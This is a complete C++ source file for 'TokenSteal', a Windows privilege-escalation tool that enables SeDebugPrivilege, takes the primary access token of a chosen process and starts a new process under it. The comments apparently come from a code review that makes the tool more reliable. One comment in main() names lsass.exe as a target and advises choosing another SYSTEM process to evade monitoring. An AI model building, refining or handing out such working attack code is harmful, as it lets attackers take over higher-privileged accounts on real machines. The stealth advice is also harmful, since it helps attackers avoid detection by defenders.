/*
 * TokenSteal v1.0 - Windows Privilege Escalation via access-token duplication
 * Author: X14F7 | 2026-03-07 | T1134.001 (MITRE ATT&CK: Access Token Manipulation - Token Impersonation/Theft)
 * Usage: ./tokensteal.exe   (prompts for the PID of the process whose primary token is to be duplicated)
 * [!] Run from an elevated (admin) prompt: SeDebugPrivilege is enabled at runtime so the target
 *     process can be opened regardless of its DACL, and CreateProcessWithTokenW additionally
 *     requires SeImpersonatePrivilege on the caller (normally held by an elevated administrator).
 */
#include <windows.h>
#include <iostream>
using namespace std;
// File-level state shared between main() and the helpers below.
// Globals are zero-initialised by the language; the initialisers make that explicit.
int pid = 0;                 // target process id, read from stdin in main()
HANDLE hprocess = NULL;      // handle to the target process (set by stealToken)
BOOL hprocesstoken = FALSE;  // result of OpenProcessToken on the target (set by stealToken)
HANDLE Token = NULL;         // the target's primary token handle (set by stealToken)
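/*
 * Enables a single named privilege (e.g. L"SeDebugPrivilege") on the
 * calling process's own primary token.
 *
 * privdeb: privilege constant name as understood by LookupPrivilegeValueW.
 * Returns TRUE only if the privilege is now enabled.
 *
 * Why the extra GetLastError check: AdjustTokenPrivileges returns TRUE even
 * when the token does not hold the requested privilege at all (e.g. a
 * non-elevated caller) and only signals that through ERROR_NOT_ALL_ASSIGNED,
 * so the original "return true" silently reported success in that case.
 */
BOOL setPriv(LPCWSTR privdeb){
    LUID luid{};
    if(!LookupPrivilegeValueW(NULL, privdeb, &luid)){
        return FALSE;
    }
    HANDLE owntoken = NULL;
    if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &owntoken)){
        return FALSE;
    }
    TOKEN_PRIVILEGES owntokenpriv{};
    owntokenpriv.PrivilegeCount = 1; // enable exactly one privilege on our own token
    owntokenpriv.Privileges[0].Luid = luid;
    owntokenpriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL ok = AdjustTokenPrivileges(owntoken, FALSE, &owntokenpriv, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    // Capture the error before any further Win32 call can overwrite it.
    const DWORD err = GetLastError();
    if(ok && err == ERROR_NOT_ALL_ASSIGNED){
        ok = FALSE; // privilege is not held by this token, so it was not enabled
    }
    CloseHandle(owntoken); // the original leaked this handle
    return ok;
}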
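/*
 * Opens the target process and obtains a handle to its primary token.
 *
 * pid: target process id (shadows the file-level `pid` global). Must be > 0.
 * Returns the token handle, or NULL on failure. For compatibility with the
 * original layout the handle is also stored in the file-level `Token`
 * global and `hprocesstoken` records the OpenProcessToken result. The
 * caller owns the returned handle and should CloseHandle it when done.
 *
 * PROCESS_QUERY_LIMITED_INFORMATION is the minimum access OpenProcessToken
 * needs on the process handle; SeDebugPrivilege (see setPriv) is what lets
 * the open succeed against processes whose DACL would otherwise deny it.
 *
 * Fixes vs. the original: a failed OpenProcess no longer falls through into
 * OpenProcessToken(NULL, ...) and a second error message; the process handle
 * is not created inheritable (nothing here needs to pass it to a child) and
 * is closed instead of leaked.
 */
HANDLE stealToken(int pid){
    Token = NULL;
    hprocesstoken = FALSE;
    if(pid <= 0){
        std::cout << "[!] Could not get process handle!" << std::endl;
        return NULL;
    }
    hprocess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, static_cast<DWORD>(pid));
    if(hprocess == NULL){
        std::cout << "[!] Could not get process handle!" << std::endl;
        return NULL;
    }
    // MAXIMUM_ALLOWED: take whatever the token's DACL grants us. DuplicateTokenEx
    // in createProc needs TOKEN_DUPLICATE to be among the granted rights.
    hprocesstoken = OpenProcessToken(hprocess, MAXIMUM_ALLOWED, &Token);
    // The process handle is only needed to reach the token; release it now.
    CloseHandle(hprocess);
    hprocess = NULL;
    if(!hprocesstoken){
        std::cout << "[!] Could not get process token!" << std::endl;
        Token = NULL;
        return NULL;
    }
    std::cout << "[+] Successfully stolen Token!: " << Token << std::endl;
    return Token;
}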
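/*
 * Duplicates `Token` into a new primary token and starts `applicationpath`
 * under it via CreateProcessWithTokenW (LOGON_WITH_PROFILE).
 *
 * Token: a token handle with at least TOKEN_DUPLICATE (as returned by
 *        stealToken). Shadows the file-level `Token` global.
 * applicationpath: full path of the executable to launch.
 * Returns TRUE only if the new process was actually created.
 *
 * The original ignored the results of both DuplicateTokenEx and
 * CreateProcessWithTokenW and returned TRUE unconditionally, so main()
 * reported success even when nothing was launched; it also left iToken and
 * the process/thread handles open and did not set STARTUPINFOW.cb.
 * Note: CreateProcessWithTokenW requires SeImpersonatePrivilege on the
 * caller (documented Win32 requirement, normally held by an elevated admin).
 */
BOOL createProc(HANDLE Token, LPCWSTR applicationpath){
    if(Token == NULL || applicationpath == NULL){
        return FALSE;
    }
    HANDLE iToken = NULL;
    STARTUPINFOW SInfo;
    PROCESS_INFORMATION PInfo;
    ZeroMemory(&SInfo, sizeof(SInfo));
    ZeroMemory(&PInfo, sizeof(PInfo));
    SInfo.cb = sizeof(SInfo); // required by the CreateProcess* family
    if(!DuplicateTokenEx(Token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &iToken)){
        const DWORD err = GetLastError();
        std::cout << "[!] DuplicateTokenEx failed: " << err << std::endl;
        return FALSE;
    }
    BOOL ok = CreateProcessWithTokenW(iToken, LOGON_WITH_PROFILE, applicationpath, NULL, 0, NULL, NULL, &SInfo, &PInfo);
    if(ok){
        // We do not wait on or manage the child; drop our references to it.
        CloseHandle(PInfo.hThread);
        CloseHandle(PInfo.hProcess);
    }
    else{
        const DWORD err = GetLastError();
        std::cout << "[!] CreateProcessWithTokenW failed: " << err << std::endl;
    }
    CloseHandle(iToken); // the duplicated token was leaked in the original
    return ok;
}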
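/*
 * Entry point: reads a target PID from stdin, enables SeDebugPrivilege on
 * this process, duplicates the target's primary token and launches
 * notepad.exe under it. Returns 0 on success, -1 on any failure.
 *
 * Fixes vs. the original: the PID read is validated (a failed extraction
 * previously left `pid` as 0 or garbage and continued), the stolen token
 * handle is closed, and the function returns an explicit exit code on
 * success instead of falling off the end.
 */
int main(){
    std::cout << "Whats the PID of the Process: "; //Preferably lsass.exe
    // NOTE(review): any process running as the desired account works for
    // T1134.001; lsass.exe is a common choice but handle opens against it
    // are widely monitored, so consider another SYSTEM process if stealth matters.
    if(!(std::cin >> pid) || pid <= 0){
        printf("[!] Invalid PID");
        return -1;
    }
    LPCWSTR applicationpath = L"C:\\Windows\\notepad.exe"; //Replace with the path of the application you want to start with higher privilege
    if(!setPriv(L"SeDebugPrivilege")){
        // Original message blamed the "desired application"; the privilege is
        // enabled on this process's own token, so report that accurately.
        printf("[!] Could not enable SeDebugPrivilege on the current process");
        return -1;
    }
    Token = stealToken(pid);
    if(Token == NULL){
        return -1; // stealToken already printed the reason
    }
    int rc = 0;
    if(createProc(Token, applicationpath)){
        printf("[+] Application set on the desired privilage!");
    }
    else{
        printf("[!] Could not set application on the desired privilage");
        rc = -1;
    }
    CloseHandle(Token); // owned by us since stealToken returned it
    return rc;
}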